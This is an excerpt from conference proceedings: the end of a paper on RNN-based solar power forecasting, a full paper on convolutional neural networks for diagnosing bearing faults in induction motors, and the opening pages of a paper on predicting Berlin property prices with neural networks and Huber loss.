Jan
RMSE MAE MAPE
30.14 68.75 11.01
29.87 39.6 6.06
Feb
RMSE MAE MAPE
57.50 73.00 22.82
31.38 38.6 11.90
Mar
RMSE MAE MAPE
53.93 67.79 19.95
30.19 37.40 11.29
229
230
S. M. Babbar and L. C. Yong
Fig. 15. Comparison of RNN with the persistence model.
6 Conclusion and Future Work In this paper, the implementation of RNN containing the Levenberg-Marquardt model is used to predict six hours ahead of solar power generation. Unlike other traditional neural networks, RNN best deals with huge data sets’ complexities containing errors and biases. It omits the errors at its maximum with the back-propagation property, where the simulations and verifications are made on the real-time data set. The proposed forecasting methods have reduced %MAPE from almost 18% to 11%, which comes under good accuracy while RMSE is dropping compared to the persistence model. The RMSE is decreasing from 47 to 30. It depicts that the RNN model is more accurate as compared to the persistence model. Consequently, the proposed model provides well-founded forecasting for the actual PV power grids. Additionally, the proposed methodology can also enhance the future employments of solar energy and be used for broader time horizons. In the future prospect, exciting and accurate work can be added for further improvements. There is always room for advancements in machine learning approaches. A plethora of work has been done in the field of energy forecasting. Firstly, different training models like gradient descent, resilient propagation, and Bayesian regularization can be implemented on the RNN for observing the performance. Secondly, more precision can be observed in the PV power output by a combination of different machine learning approaches, such as SVM and regression techniques [27]. Lastly, the RNN model can be applied to other forecasting fields like wind speed, energy management, trading and load forecasting etc.
References 1. Hadi, R.S., Abdulateef, O.F.: Modeling and prediction of photovoltaic power output using artificial neural networks considering ambient conditions. Assoc. Arab Univ. J. Eng. Sci. 25(5), 623–638 (2018) 2. Ogundiran, P.: Renewable energy as alternative source of power and funding of renewable energy in Nigeria. Asian Bull. Energ. Econ. Technol. 4(1), 1–9 (2018)
Short Term Solar Power Forecasting Using Deep Neural Networks
231
3. Antonanzas, J., Osorio, N., Escobar, R., Urraca, R., Mar-tinez-De-Pison, F., AntonanzasTorres, F.: Review of photovoltaic power forecasting. Sol. Energy 136(78–111), 4 (2016) 4. Abuella, M.: Solar power forecasting using artificial neural networks. In: North American Power Symposium, IEEE, pp. 1–5 (2015) 5. Kaur, A.N.: Benefits of solar forecasting for energy imbalance markets. Renew. Energ. 86, 819–830 (2015) 6. Kikusato, H., Mori, K., Yoshizawa, S., Fujimoto, Y., Asano, H., et al.: Electric vehicle charge– discharge management for utilization of photovoltaic by coordination between home and grid energy management systems. IEEE Trans. Smart Grid 10(3), 3186–3197 (2018) 7. Ni, K., Wang, J., Tang, G., Wei, D.: Research and application of a novel hybrid model based on a deep neural network for electricity load forecasting: a case study in Australia. Energies 12(13), 2467 (2019) 8. Kumari, J.: Mathematical modeling and simulation of photovoltaic cell using matlab-simulink environment. Int. J. Electr. Comput. Eng. 2(1), 26 (2012) 9. Li, G., Wang, H., Zhang, S., Xin, J., Liu, H.: Recurrent neural networks based photovoltaic power forecasting approach. Energies 12(13), 2538 (2019) 10. Torres, J.F., Troncoso, A., Koprinska, I., Wang, Z., Martínez-Álvarez, F.: Big data solar power forecasting based on deep learning and multiple data sources. Expert. Syst. 36(4), e12394 (2019) 11. Cervone, G., Clemente-Harding, L., Alessandrini, S., Delle Monache, L.: Short-term photovoltaic power forecasting using artificial neural networks and an analog ensemble. Renew. Energ. 108, 274–286 (2017) 12. Shi, J., Lee, W., Liu, Y., Yang, Y., Wang, P.: Forecasting power output of photovoltaic (2015) 13. Abdel-Nasser, M., Mahmoud, K.: Accurate photovoltaic power forecasting models using deep LSTM-RNN. Neural Comput. 31, 1–14 (2017) 14. Pazikadin, A., Rifai, D., Ali, K., Malik, M., Abdalla, A., Faraj, M.: Solar irradiance measurement instrumentation and power solar generation forecasting based on artificial neural networks (ANN): a review of five years research trend. Sci. Total Environ. 715, 136848 (2020) 15. Mishra, S. Palanisamy, P.: Multi-time-horizon solar forecasting using recurrent neural network. In: 2018 IEEE Energy Conversion Congress and Exposition (ECCE), pp. 18–24. IEEE (2018) 16. Ye, Z., Kim, M.K.: Predicting electricity consumption in a building using an optimized backpropagation and Levenberg–Marquardt back-propagation neural network: case study of a shopping mall in China. Sustain. Cities Soc. 42, 176–183 (2018) 17. Panamtash, H., Zhou, Q., Hong, T., Qu, Z., Davis, K.: A copula-based Bayesian method for probabilis-tic solar power forecasting. Sol. Energ. 196, 336–345 (2020) 18. Zhang, R., Meng, F., Zhou, Y., Liu, B.: Relation classification via recurrent neural network with attention and tensor layers. Big Data Min. Analytics 1(3), 234–244 (2018) 19. Yu, Y., Si, X., Hu, C., Zhang, J.: A review of recurrent neural networks: LSTM cells and network architectures. Neural Comput. 31(7), 1235–1270 (2019) 20. Lee, D., Kim, K.: Recurrent neural network-based hourly prediction of photovoltaic power output using meteorological information. Energies 12(2), 215 (2019) 21. Salehinejad, H., Sankar, S., Barfett, J., Colak, E., Valaee, S.: Recent advances in recurrent neural networks.. arXiv preprint arXiv, 1801.01078 (2017) 22. Javed, A., Kasi, B.K., Khan, F.A.: Predicting solar irradiance using machine learning techniques. In: 2019 15th International Wireless Communications & Mobile Computing Conference (IWCMC), pp. 1458–1462 (2019) 23. Chicco, D., Warrens, M.J.: The coefficient of determination R-squared is more informative than SMAPE, MAE, MAPE, MSE and RMSE in regression analysis evaluation. PeerJ Comput. Sci. 7, e623 (2021)
232
S. M. Babbar and L. C. Yong
24. Wang, L., Lv, S.X., Zeng, Y.R.: Effective sparse adaboost method with ESN and FOA for industrial electricity consumption forecasting in China. Energy 155, 1013–1031 (2018) 25. Babbar, S.M., Lau, C.Y., Thang, K.F.: Long term solar power generation prediction using adaboost as a hybrid of linear and non-linear machine learning model. Int. J. Adv. Comput. Sci. Appl. 12(11) 2021 26. Ding, J., Tarokh, V., Yang, Y.: Model selection techniques: an overview. IEEE Sig. Process. Mag. 35(6), 16–34 (2018) 27. Babbar, S.M., Lau, C.Y.: Medium term wind speed forecasting using combination of linear and nonlinear models. Solid State Technol. 63(1s), 874–882 (2020)
Convolutional Neural Networks for Fault Diagnosis and Condition Monitoring of Induction Motors Fatemeh Davoudi Kakhki1,2(B) and Armin Moghadam1 1 Department of Technology, San Jose State University, San Jose, CA 95192, USA
{fatemeh.davoudi,armin.moghadam}@sjsu.edu 2 Machine Learning and Safety Analytics Lab, Department of Technology,
San Jose State University, San Jose, CA 95192, USA
Abstract. Intelligent fault diagnosis methods using vibration signal analysis is widely used for fault detection of bearing for condition monitoring of induction motors. This has several challenges. First, a combination of various data preprocessing methods is required for preparing vibration time-series data as input for training machine learning models. in addition, there is no specific number(s) of features or one methodology for data transformation that guarantee reliable fault diagnosis results. In this study, we use a benchmark dataset to train convolutional neural networks (CNN) on raw vibration signals and feature-extracted data in two separate experiments. The empirical results show that the CNN model trained on raw data has superior performance, with an average accuracy of 98.64%, and ROC and F1 score of over 0.99. The results suggest that training deep learning models such as CNN are promising substitution for conventional signal processing and machine learning models for fault diagnosis and condition monitoring of induction motors. Keywords: Bearing fault diagnosis · Convolutional neural networks · Condition monitoring
1 Introduction Bearing fault is the most common type of fault and main source of machine failures in induction motors [1]. Unexpected machine failure may have disastrous consequences such as personnel casualties, financial loss and breakdown of the motor [2]. Therefore, condition monitoring and fault diagnosis of machinery is crucial to the safe and reliable production in industrial systems [3]. Condition monitoring includes the processes and methods for observing the health of the system in fixed interval times [3]. Condition monitoring of induction motors provides the opportunity to prevent or minimize unscheduled downtime and increase efficiency of induction motors [3, 4]. There are many procedures for fault diagnosis of bearing in induction motors. One of the efficient approaches for detecting faults in bearings is the comparison between © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 233–241, 2023. https://doi.org/10.1007/978-3-031-28073-3_16
234
F. D. Kakhki and A. Moghadam
normal and faulty vibration signals [5–7] gained from induction motor using vibration sensors such as accelerometers. These sensors can be located around the bearing in a designed testbed and show the condition of the bearing [8]. Since these signals contained considerable amount of noise, they do not distinct faulty conditions of bearing if analyzed in raw format. In addition, feature extraction from vibration signals is challenging for fault diagnosis purposes due to the non-stationary and non-linear nature of signals [6]. The rest of the paper is organized as follows: Sect. 2 presents a brief discussion on previous related works in using machine learning and deep learning models for condition monitoring of induction motors. The details of data used in the study and methodology are explained in Sects. 3 and 4, followed by presentation and discussion of results in Sect. 5. A brief overview of the work plus implementation of results for condition monitoring, in Sect. 6, completes this paper.
2 Related Work To address the challenges raised from the nature of vibration signals, various signal processing methods have been used in literature to prepare vibration type data for fault detection analysis. Many studies have focused on fault diagnosis in bearings using signal processing approaches [9, 10] and recently machine learning (ML) methods [6, 11–15]. ML models are popular in prognostics and health management studies for structural health and condition monitoring [16]. The combination of signal processing and ML models have shown promise in providing high accuracy in classification and prediction of faulty versus normal bearing conditions. A popular method for preparing data for modeling is extracting time domain statistical features from raw signals, and feed them as input for training ML models [10, 17, 18]. The purpose of feature extraction is to reduce the high dimension of the data as well as improving the accuracy and predictive power of the models [19]. The main challenge with this approach is that there exists no single scientific rule for the exact number of features that can be drawn from signals for gaining highest accuracy from training ML models. Therefore, experimental studies with different feature extraction approaches, with various numbers and types of features, are conducted for fault diagnosis of bearings [5]. However, an alternative solution is to take advantage of modeling techniques that do not necessarily require feature extraction, and their performance is not significantly affected by the quantity and type of features extracted from vibration signals. Deep neural networks, or deep learning (DL) models, could be used as an alternative for the purpose of fault diagnosis and detection to address the challenges of data preparation, which is a required and influential step in training ML models. The reason is that DL algorithms are capable of automatically extracting most important features from original signals and simultaneously classifying types of fault [20]. Furthermore, DL models have high performance in extracting information from noisy data and avoid overfitting as they are non-parametric statistical models [21]. The structure of a DL model typically includes an input layer, hidden layers, and an output layer. DL models are capable of detecting complex nonlinear relationship between the input and output data [22]. Among various types of DL algorithms, convolutional
Convolutional Neural Networks for Fault Diagnosis
235
neural networks (CNN) seems promising for fault detection of bearing when applied on raw signals or on transformed signal data [2, 23]. Compared to typical neural networks, large-scale network implementation with CNN is more efficient, and less challenging. In addition, CNN models have the weight sharing feature that allows the network to be trained on the reduced number of features to enhance generalizability of models and avoid overfitting [25]. A CNN structure has a convolutional layer, a pooling layer, and a fully connected layer. The feature extraction and classification occur simultaneously [8]. The purpose of this study is to evaluate the performance of CNN models in accurate classification of bearing faults in induction motors. Using a benchmark dataset in this paper, we compare the performance of CNN in classifying types of faults in bearing in two different experiments, one with CNN being trained on raw data and one on specifically extracted features data. The results contribute to performance assessment of CNN models in each experiment, and provide insights for most efficient and costeffective method for fault diagnosis for the purpose of condition monitoring in induction motors.
3 Data Description Majority of studies in condition monitoring of induction motors through fault diagnosis of bearing evaluate their proposed solution on publicly available benchmark datasets [24]. In this study, we used the public ally available data set from the Case Western Reserve University, known as the CWRU data, and has been used by researchers in fault diagnosis area as a benchmark dataset. According to the available data on how CWRU data was generated, the data was collected through two accelerometers that captured the vibration signals in both drive end (DE) bearing and fan end bearing. Each bearing consisted of four main components of inner race, outer race, rolling element and cage, in each of which a bearing fault might occur. The CWRU dataset includes single point faults that were generated, using electrodischarge machining, at 0.007, 0.014, and 0.021 (inch) diameters in three parts: bearing inner raceway (IR), bearing outer raceway (OR), and bearing ball (B). The dataset also includes normal status data on bearing. In this study, we used a subset of the data for performing two experimental modeling. We used a subset of the whole data which includes vibration signals at DE bearing, collected for motor loads of one horsepower and motor speed of 1772 rpm for sampling frequencies of 48 kHz.
4 Methodology In order to evaluate the effect of data preprocessing for fault diagnosis purposes in this research, the performance of the same model should be evaluated on raw data and already preprocessed data. Therefore, we propose two experiments. In the first experiment, data points from raw signals are used for developing the first CNN model. In the second one, specific statistical features are extracted from each row of data, and are used as input variables for building the second CNN model.
236
F. D. Kakhki and A. Moghadam
4.1 Experiment One: Raw Signal Data In this experiment, raw data is used for training CNN models. The only preprocessing step on the data is choosing proper sampling intervals that can be representative the whole data behavior. To reduce overlapping between two data sample intervals, we used segmentation of data for drawing training and testing samples for model training. To produce larger sampling data for the CNN model, for the 48 kHz sampling frequency, we collected segments of length1024. Therefore, approximately 460 sample points per revolution for each type of bearing fault with length of 1024, are generated with a total of 10 output classes for normal and faulty bearing. The classes are B/IR/OR0.007, B/IR/OR0.014, B/IR/OR0.021 for faults at various diameters in ball, inner race, and outer race, respectively. Therefore, B0.007 represent data where fault was located in the bearing ball with 0.007 diameter. All other classes can be interpreted the same, representing a total of nine output levels for faulty bearings plus one class representing normal bearings in good condition. The final prepared dataset has the dimension of (460*10, 1024) for the 10 various labels. In the next step, data is partitioned into 80% for training and 20% for testing. The CNN model is built on training data, and its performance in evaluated on the test data. The details of the sequential CNN used in this study is given in Table 1, which includes the types of layers and number of parameters for each layer. CNN model is trained on this segmented raw data with 50 epochs and batch size 128. Table 1. CNN structure for experiment on raw data Layer
Output shape
Number of parameters*
Conv2d
(none, 24, 24, 32)
2624
Max_pooling2d
(none, 12, 12, 32)
0
Conv2d_1
(none, 4, 4, 32)
82976
Max_pooling2d_1
(none, 2, 2, 32)
0
flatten
(none, 128)
0
dense
(none, 64)
8256
Dense_1
(none, 96)
6240
Dense_2
(none, 10)
970
* Total parameters: 101,066; trainable parameters: 101,066; non-trainable parameters: 0
4.2 Experiment Two: Statistical Features Data In the second experiment, we extracted time domain statistical features from segmented data. To reduce the number of input variables in the CNN model, instead of the whole data points, we used time domain feature extraction methodology. In this approach, a number of statistical features from each raw of normal and faulty signals are extracted,
Convolutional Neural Networks for Fault Diagnosis
237
and labeled with the relevant class. These features are used as input in the CNN for classifying and predicting type of fault class. The time domain statistical features we used are vibration values of minimum, maximum, mean, standard deviation, root mean square error, skewness, kurtosis, crest factor, and form factor, representing F1 to F9 , respectively. These features can be calculated using python NumPy and SciPy libraries. Adding fault labels to the dataset, the feature extracted data shape has input size (460*10, 10), corresponding to the DE time, nine statistical features F1 to F9 , and fault class. The statistical formula for the extracted features is shown in Table 2. In the next step, 80% of the data is used for training CNN model. The performance of the model is assessed using the other 20% of data, as test set. The details of the sequential CNN used in this study is given in Table 3, which includes the types of layers and number of parameters for each layer. CNN model is trained on the features extracted data with 50 epochs and batch size 128. Table 2. Statistical features used in the study Statistical feature
Equation
Statistical feature
Equation n
i=1 xi
Minimum
F1 = min(xi )
Root mean square
F5 =
Maximum
F2 = max(xi )
Skewness
F6 = 1n
Mean
n F3 = 1n xi
Kurtosis
F7 = 1n
Crest factor
F8 = xxmax
Form factor
F9 = X μ
i=1
Standard deviation
F4 =
n (x −μ)2 i=1 i
n−1
n
i=1 (xi −μ) σ3
3
n
i=1 (xi −μ) σ4
4
min
rms
Table 3. CNN structure for experiment on statistical feature data Layer
Output shape
Number of parameters*
Conv2d
(none, 28, 28, 6)
156
Max_pooling2d
(none, 14, 14, 6)
0
Conv2d_1
(none, 10, 10, 16)
2416
Max_pooling2d_1
(none, 5, 5, 16)
0
flatten
(none, 400)
0
dense
(none, 120)
48120
Dense_1
(none, 84)
10164
Dense_2
(none, 10)
850
2
n
* Total parameters: 61,706; trainable parameters: 61,760; non-trainable parameters: 0
238
F. D. Kakhki and A. Moghadam
5 Results The model performance metrics we used are average accuracy, receiver operating characteristic curve (ROC) values and F1 score. The values for ROC are between 0 and 1, and values closer to 1 show higher power and usefulness of the model in distinguishing among multi-level classes in a classification problem. Another measure of model performance, F1 score, represents the weighted average of recall and precision values of a classifier model and is a more reliable metric for performance assessment compared to average accuracy of the model [26]. The results from CNN model performance for both experiments are shown in Table 4. Table 4. CNN performance on raw data and statistical feature data Loop iteration
Experiment 1 accuracy
Experiment 2 accuracy
1
0.9859
0.9728
2
0.9870
0.9522
3
0.9880
0.9554
4
0.9793
0.9543
5
0.9815
0.9717
6
0.9859
0.9696
7
0.9880
0.9674
8
0.9913
0.9804
9
0.9859
0.9598
10
0.9913
0.9609
Average accuracy
0.9864 ± 0.0036
0.9645 ± 0.0088
ROC
0.9951
0.9891
F1 Score
0.9913
0.9804
In experiment one, we trained the CNN model on the raw segmented data. The average model accuracy is 0.9864 with a standard deviation of 0.0036. The ROC and F1 score values are also high. The results show that CNN model was capable of producing reasonably good classification values even though it was trained with raw data without any specific preprocessing method. In experiment two, we trained the CNN model on the nine statistical features that were extracted from each raw of signal data. This adds an extra data preprocessing step to the process, which requires more time and computational resources. For this experiment, the average model accuracy is 0.9645 with a standard deviation of 0.0088. The ROC and F1 scores are 0.9891 and 0.9804. While comparable with results from experiment one, all model performance values are slightly lower for CNN developed on specific number of statistical features.
Convolutional Neural Networks for Fault Diagnosis
239
This result is significant since previous studies have shown ML methods have better performance while trained on feature data, compared to raw signal data. However, result of this study show that CNN have superior performance when trained on raw data. This confirms the challenge that was mentioned previously here regarding no single rule for the number of features or type of features that can produce the highest performance models for purpose of fault diagnosis.
6 Conclusion This study conducted an empirical study on application and performance assessment of convolutional neural networks in fault diagnosis of bearing using Case Western Reserve University benchmark dataset for 48 kHz data. We trained two multi-classification convolutional neural networks; one on raw data and one on time domain statistical features that were extracted from vibration signals for nine types of faults and normal bearing condition. The results confirm better performance of convolutional neural network in producing superior results in multi-level fault classification of bearing due to its capability in automatically extracting most important features for distinguishing among multi-classes of outputs. The results suggest that deep learning models such as convolutional neural networks can be used as reliable fault detection and classification approach for condition monitoring due to less requirement for data preprocessing and preparation, compared to methods in which data transformation is required for model training, such as conventional machine learning modeling. Future direction of this study includes developing other deep learning algorithms to provide a comprehensive comparative study for application of such methods in fault diagnosis and condition monitoring of induction motors.
References 1. Cerrada, M., et al.: A review on data-driven fault severity assessment in rolling bearings. Mech. Syst. Sig. Process. 99, 169–196 (2018). https://doi.org/10.1016/j.ymssp.2017.06.012 2. Lu, C., Wang, Y., Ragulskis, M., Cheng, Y.: Fault diagnosis for rotating machinery: a method based on image processing. PLoS ONE 11(10), 1–22 (2016). https://doi.org/10.1371/journal. pone.0164111 3. Choudhary, A., Goyal, D., Shimi, S.L., Akula, A.: Condition monitoring and fault diagnosis of induction motors: a review. Arch. Comput. Methods Eng. 26(4), 1221–1238 (2018). https:// doi.org/10.1007/s11831-018-9286-z 4. Duan, Z., Wu, T., Guo, S., Shao, T., Malekian, R., Li, Z.: Development and trend of condition monitoring and fault diagnosis of multi-sensors information fusion for rolling bearings: a review. Int. J. Adv. Manuf. Technol. 96(1–4), 803–819 (2018). https://doi.org/10.1007/s00 170-017-1474-8 5. Sugumaran, V., Ramachandran, K.I.: Effect of number of features on classification of roller bearing faults using SVM and PSVM. Expert Syst. Appl. 38(4), 4088–4096 (2011). https:// doi.org/10.1016/j.eswa.2010.09.072 6. Moghadam, A., Kakhki, F.D.: Comparative study of decision tree models for bearing fault detection and classification. Intell. Hum. Syst. Integr. (IHSI 2022) Integr. People Intell. Syst. vol. 22, no. Ihsi 2022, (2022). https://doi.org/10.54941/ahfe100968
240
F. D. Kakhki and A. Moghadam
7. Russo, D., Ahram, T., Karwowski, W., Di Bucchianico, G., Taiar, R. (eds.): IHSI 2021. AISC, vol. 1322. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-68017-6 8. Toma, R.N., et al.: A bearing fault classification framework based on image encoding techniques and a convolutional neural network under different operating conditions. Sensors 22, 4881 (2022). https://www.mdpi.com/1424-8220/22/13/4881 9. Li, C., Cabrera, D., De Oliveira, J.V., Sanchez, R.V., Cerrada, M., Zurita, G.: Extracting repetitive transients for rotating machinery diagnosis using multiscale clustered grey infogram. Mech. Syst. Sign. Process. 76–77, 157–173 (2016). https://doi.org/10.1016/j.ymssp. 2016.02.064 10. Li, C., Sanchez, V., Zurita, G., Lozada, M.C., Cabrera, D.: Rolling element bearing defect detection using the generalized synchrosqueezing transform guided by time-frequency ridge enhancement. ISA Trans. 60, 274–284 (2016). https://doi.org/10.1016/j.isatra.2015.10.014 11. Li, C., et al.: Observer-biased bearing condition monitoring: from fault detection to multifault classification. Eng. Appl. Artif. Intell. 50, 287–301 (2016). https://doi.org/10.1016/j.eng appai.2016.01.038 12. Yang, Y., Fu, P., He, Y.: Bearing fault automatic classification based on deep learning. IEEE Access 6, 71540–71554 (2018). https://doi.org/10.1109/ACCESS.2018.2880990 13. Islam, M.M.M., Kim, J.M.: Automated bearing fault diagnosis scheme using 2D representation of wavelet packet transform and deep convolutional neural network. Comput. Ind. 106, 142–153 (2019). https://doi.org/10.1016/j.compind.2019.01.008 14. Zhang, Y., Ren, Z., Zhou, S.: A new deep convolutional domain adaptation network for bearing fault diagnosis under different working conditions. Shock Vib. 2020 (2020). https://doi.org/ 10.1155/2020/8850976 15. Atmani, Y., Rechak, S., Mesloub, A., Hemmouche, L.: Enhancement in bearing fault classification parameters using gaussian mixture models and mel frequency cepstral coefficients features. Arch. Acoust. 45(2), 283–295 (2020). https://doi.org/10.24425/aoa.2020.133149 16. Badarinath, P.V., Chierichetti, M., Kakhki, F.D.: A machine learning approach as a surrogate for a finite element analysis: status of research and application to one dimensional systems. Sensors 21(5), 1–18 (2021). https://doi.org/10.3390/s21051654 17. Soualhi, A., Medjaher, K., Zerhouni, N.: Bearing health monitoring based on hilbert-huang transform, support vector machine, and regression. IEEE Trans. Instrum. Meas. 64(1), 52–62 (2015). https://doi.org/10.1109/TIM.2014.2330494 18. Prieto, M.D., Cirrincione, G., Espinosa, A.G., Ortega, J.A., Henao, H.: Bearing fault detection by a novel condition-monitoring scheme based on statistical-time features and neural networks. IEEE Trans. Ind. Electron. 60(8), 3398–3407 (2013). https://doi.org/10.1109/TIE. 2012.2219838 19. Toma, R.N., Prosvirin, A.E., Kim, J.M.: Bearing fault diagnosis of induction motors using a genetic algorithm and machine learning classifiers. Sensors (Switz) 20(7), 1884 (2020). https://doi.org/10.3390/s20071884 20. Hoang, D.T., Kang, H.J.: A survey on deep learning based bearing fault diagnosis. Neurocomputing 335, 327–335 (2019). https://doi.org/10.1016/j.neucom.2018.06.078 21. Kakhki, F.D., Freeman, S.A., Mosher, G.A.: Use of neural networks to identify safety prevention priorities in agro-manufacturing operations within commercial grain elevators. Appl. Sci. 9, 4690 (2019). https://doi.org/10.3390/app9214690 22. Yedla, A., Kakhki, F.D., Jannesari, A.: Predictive modeling for occupational safety outcomes and days away from work analysis in mining operations. Int. J. Environ. Res. Public Health 17(19), 1–17 (2020). https://doi.org/10.3390/ijerph17197054 23. Zhang, D., Zhou, T.: Deep convolutional neural network using transfer learning for fault diagnosis. IEEE Access 9, 43889–43897 (2021). https://doi.org/10.1109/ACCESS.2021.306 1530
Convolutional Neural Networks for Fault Diagnosis
241
24. Zhang, J., Zhou, Y., Wang, B., Wu, Z.: Bearing fault diagnosis base on multi-scale 2D-CNN model. In: Proceedings of 2021 3rd International Conference on Machine Learnimg Big Data Bus. Intell. MLBDBI 2021, no. June 2020, pp. 72–75 (2021). https://doi.org/10.1109/MLB DBI54094.2021.00021 25. Alzubaidi, L., et al.: Review of deep learning: concepts, CNN architectures, challenges, applications, future directions. J. Big Data 8, 1–74 (2021) 26. Kakhki, F.D., Freeman, S.A., Mosher, G.A.: Evaluating machine learning performance in predicting injury severity in agribusiness industries. Saf. Sci. 117, 257–262 (2019). https:// doi.org/10.1016/j.ssci.2019.04.026
Huber Loss and Neural Networks Application in Property Price Prediction Alexander I. Iliev1,2(B) and Amruth Anand1,2 1 SRH Berlin University, Charlottenburg, Germany
[email protected] 2 Institute of Mathematics and Informatics, Bulgarian Academy of Sciences, Sofia, Bulgaria
Abstract. In this paper we aim to explore the Real Estate Market in Germany, and particularly we have taken a dataset of Berlin and applied various advanced neural network and optimisation techniques. It’s always difficult for people to estimate what price is best for a property and there are various categorical and numerical features involved in it. And the main challenge is to choose the model, loss function and customize the neural network to best fit for the marketplace data. We have developed a project that can be used to predict the property price in Berlin. Firstly, we have worked on procuring the online current market price of the property by web scraping. Then we did intensive exploratory Data Analysis on it, prepared the best data for experiments. Then we build four different models and worked on the best loss functions which can suite our model and tabulated the mean squared and mean absolute errors for the same. We have tested our model with the current on the market properties, and the sample results are plotted. This methodology can be applied efficiently, and the results can be used by the people who are interested in investing in real estate in Berlin, Germany. Keywords: Huber loss · Hyperparameter tuning · Exploratory data analysis · Recurrent neural nets · Convolution neural nets · Deep neural nets
1 Introduction Real Estate is a great investment option, investing on a property is always difficult in Germany due to the lack of visibility in the market data. In this paper we aim to build an AI model which will help make decision for the most suitable price for a property in Berlin [1–5]. In the study carried out we hypothesize that Huber loss function suits best for real estate data. And we used different neural network models to test this hypothesis and compared with a standard mean squared error loss function. During these experiments we also considered using different neural networks to compare which suits the best. In this paper, we covered collecting data and performing exploratory data analysis in Sect. 2. In Sect. 3 we discuss about different neural network models we used to perform the experiments and best optimization in order to select them. In Sect. 4, we present the results of all our finding and discuss about them. In Sect. 5, we state our conclusion for the research topic and suggest future scope for improvement. © The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 242–256, 2023. https://doi.org/10.1007/978-3-031-28073-3_17
Huber Loss and Neural Networks Application
243
2 About the Data We collected the data by scraping the data from open online resources, for this experiment we have checked the robots.txt of those websites and gathered the data. After scraping we had 15,177 properties to work on. And after exploratory data analysis we ended up with 12,743 properties. A heatmap of the data is observed in Fig. 1.
Fig. 1. Heat map of dataset
2.1 Data Preparation Preparation of data plays very important role in every Machine Learning and Artificial Intelligence projects, especially if we are trying to build our own dataset. Since we gathered information online by web scraping, there was a lot of unstructured data. We did data cleaning in Python to give it a proper structure. The feature for the property we considered are purchase price, living space, number of rooms, floor of the apartment, number of floors in the apartment, number of rooms, construction year, renovation year, list of features in the property, postcode, category to which the property belongs, balcony, garden, terrace, garden, lift, guest toilet, heating type, furnishing quality, garage space, furnishing quality, and address of the property. Since most of the above-mentioned features were not provided online, we had to exclude them and some of the features were removed because they were correlated as seen in Fig. 2 [6]. Once after removing the null data, it was important for us to investigate the outliers. First step we did removal of outliers. We used Boxplots to remove the outliers. We considered any point above third quartile by 1.5 times inter quartile range or below first quartile by more than 1.5 times inter quartile range as an outlier. For some important feature like purchase price, we had a right skewed data, so we used log1p to make it a normal distribution as seen in Fig. 3.
244
A. I. Iliev and A. Anand
Fig. 2. Heat map for features correlation
Fig. 3. Normalization
Similarly, we have considered different techniques for different features. And one important thing worth mentioning here is that we need to perform log transform to all the features associated with purchase price. During EDA, we understood a lot of insights about the real estate market in Berlin.
3 Neural Network Models We have built three different type of neural network models to experiment how the model behaves for the data we have. One was a simple deep neural network, recurrent neural network [7], and convolution neural network. We adjusted these neural nets to work for a regression problem. Like we have in this case.
Huber Loss and Neural Networks Application
245
3.1 Deep Neural Network Deep neural network is a popular choice for any regression problems, we used a fivelayer neural network model for our 12,743 data, which is shown in Fig. 4. The reason for five layer is because we know the number of hidden layers should be less than twice the size of the input layer. We have 13 features, hence five layers. Initially, we have experimented using three layers on our data, the model seems to not learn properly. We also checked out four layers, but five layers stood out the best. To select the number of hidden neurons, the thumb rule is it should be between input size layer and output size layer. But to find the best number of hidden layers, it is always an iterative process to do trial and find which is the best. In our model we have taken, 600, 450, 300, 100, and 50 as several hidden layers with one final layer.
Fig. 4. Deep neural network model
We have used ReLU activation function, activation functions controls on how well the neural network model learns from the training dataset. As we can see in the figure that we have not used activation function for our output layer, because we need the model to work as a regression problem. We chose rectified linear activation function (ReLU) because we are using five layers and we expect to have vanishing gradients in other activation function. ReLU overcomes these problems and help the model to learn quickly and perform well. Optimization is a method in neural network which is used to change the weights and learning rate in accordance to reduce the losses, this will also let us get our results much faster [8]. We have used Adam Optimizer [9]; it involves a combination of two gradient descent methodologies: • Gradient Descent with momentum • Root Mean Square Propagation (RMSprop) Adaptive moment Estimation is an algorithm for optimization technique for gradient descent. This method is efficient when working with large problem involving a lot of data or parameters. It requires less memory and is very effective and efficient. Cost function or popularly called as loss function plays a very important role in the behavioural of model. It is always important to select the best loss function for our model. For regression problem of ours we had few options and we experimented with two of them. One is Mean Squared Error and the other is Huber loss.
246
A. I. Iliev and A. Anand
Mean Squared Error is a sum of squared distances between our target variables and predicted values. n p 2 i=i yi − yi MSE = n p
MSE = mean squared error, n = number of data points, yi = observed value, and yi = predicted value.
Fig. 5. Loss function MSE
Like we explained above, we have used the same in our code shown in Fig. 5. Here, to see the performance of the model we have used metrics, MAE that is mean absolute error. We could have used any of them. As a result, for this model, we got mean squared error as 0.17 and mean absolute error as 0.27. Since, this is a regression problem, we can’t just rely on the metrics. But we also need to see how good the model has learnt itself.
Fig. 6. Loss curve ANN MSE
We can see in the graph from Fig. 6 that the model is not learning as expected, and the model is useless. But looking at this we can say that the model is not learning properly, so we decided to change the loss function and try the same model again. For this experiment we have decided to use the Huber loss function. 1 2 2 (y − f (x)) for|y − f (x)| ≤ δ, Lδ (y, f (x)) = δ|y − f (x)| − 21 δ 2 The formula says, if the error is small, we take first condition which is error squared divided by 2.
Huber Loss and Neural Networks Application
247
Here we need to define the delta. To select the delta, we have used hyperparameter tuning, as shown in Fig. 7, using a function in sklearn GridSearchCV. GridSearchCV will loop through the predefined hyperparameter’s and fit the model on our training set.
Fig. 7. Hyperparameter tuning for delta in huber loss
With this experiment we found the best delta value for our training data is 1.75. Then, we used the loss function to our model and training it again as seen in Fig. 8:
Fig. 8. Loss function huber loss
Using this, we got mean squared error as 0.21 and mean absolute error as 0.31. But most interestingly here we can see that our model has good learning rate per every epoch and there are no noises.
Fig. 9. Loss curve ANN huber loss
As we can see in the graph from Fig. 9 the model has improved its learning drastically from before. So, using Huber loss was the best option for our training data. Huber loss is less sensitive to the outliers, and we see that in real estate, some of the data points are subjected as outliers.
248
A. I. Iliev and A. Anand
